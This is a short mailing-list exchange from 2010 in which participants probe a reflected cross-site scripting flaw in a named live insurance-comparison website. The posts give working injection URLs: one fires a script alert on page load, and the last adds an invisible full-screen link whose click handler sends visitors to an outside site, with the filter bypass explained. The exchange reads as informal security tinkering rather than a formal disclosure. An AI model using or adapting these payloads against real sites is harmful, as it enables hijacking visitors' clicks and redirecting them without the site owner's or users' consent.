The Underscore Archives

On 2 Nov 2010, at 10:54, Alex Francis wrote:

> On Fri, Oct 29, 2010 at 11:00 AM, Oliver Humpage <oliver at watershed.co.uk 
> > wrote:
>>
>> Or indeed html, e.g. http://www.bewiser.co.uk/car/type/<em> . Haven't
>> got time to make JS work (they seem to do stuff with / and %2F which
>> makes adding "</script>" or "//" hard), but should be doable.
>>
>> Oliver.
>>
>
> Not sure I should be doing this really, and a bit late, but:
> http://www.bewiser.co.uk/car/type/%3Cbody%20onload=%22alert('oops')%22%3E

Very nicely done - although it doesn't work in Safari, which appears  
to refuse to execute JS that's found in the request (nicely done  
there, Safari).

Using JS's String.fromCharCode(47) you can put slashes into JS  
strings, and so:

http://www.bewiser.co.uk/car/type/%3Ca%20style=%22height:100%25;width:100%25;z-index:9999;position:absolute;display:block;%22%20onclick=%22document.location.href=%27http:%27%2BString.fromCharCode%2847%29%2BString.fromCharCode%2847%29%2B%27google.com%27;%22%3E

works quite nicely. If the <a> can be gotten to cover more of the  
screen then an onclick would work very well, so wherever the user  
clicked (e.g. on the "Get a quote now" graphic) they'd get taken to  
your site.

Oliver.